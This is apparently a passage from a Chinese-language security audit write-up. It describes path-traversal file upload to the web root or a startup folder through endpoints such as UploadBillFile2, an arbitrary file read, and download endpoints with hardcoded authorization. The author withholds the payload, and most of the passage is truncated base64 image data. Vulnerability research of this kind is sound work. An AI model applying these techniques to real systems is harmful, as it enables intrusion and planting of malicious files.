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
<p blockindex=46>payload就不放了，能看懂的人自然能构建出来，后面的<code>UploadBillFile2</code>原理也是一样的，只不过是上传的路径变了，依然可以利用文件名进行目录穿梭上传到web目录下。</p>
<p blockindex=47><img src="data:image/png;base64,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
<p blockindex=48>接着看下一处，但是这里鸡肋，因为这里的路径是通过<code>Path.GetTempPath()</code>获取的，也就是说只能上传到<code>%TMP%</code>目录下，但依然可以路径穿越到启动目录上传木马等。</p>
<p blockindex=49><img src="data:image/png;base64,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
<h2 blockindex=50>2、任意文件读取</h2>
<p blockindex=51><img src="data:image/png;base64,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
<p blockindex=52>同样在files控制器中，我们发现了很多与下载相关的接口，并且都是通过硬编码进行鉴权的。</p>
<p blockindex=53><img src=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAwoAAACoCAIAAADPZo4OAAAe+UlEQVR4nO3dsaskx53A8dKdD84WCuxEtljeIgthJQZFx+7BJeNk/oFls32g5MEGWoNAXGBktImPBwKtggcvWXjxxgeT+CUX7HJwILhEx0M2ux5kO7HhlrWEjPEFZdXV/OpXVb/urp7umfl+WJaemuqq6u6Z6d+rqu5+6ejoyAEAAOAbfzd1A3AoLr+hvkQ/7EBgCL5ByPlWNccr7z3wC88/ujdyY/7mxgcr59yT+0s1PfdWmlj19qNP4pef3nq3awlDjFR7KLZTgZeXl4vFIrfnW1ksFmJZ/Db5ZlTLefrOs7B8/WGz7s9Q7MAyfTnXHx7F7UxLfvrOM/Gya+3G3WXX73u009SzY7xXfYY0Jc1ZLn+9Xl+7ds2+4nhmeJT9Xlqv13fu3FHfirXddYvFovn3CPuh0nv0ynsPnn90z/8LcdLYcl/dJ/eXhbd6VOQDiE9vvev/iXglVc0wau32Y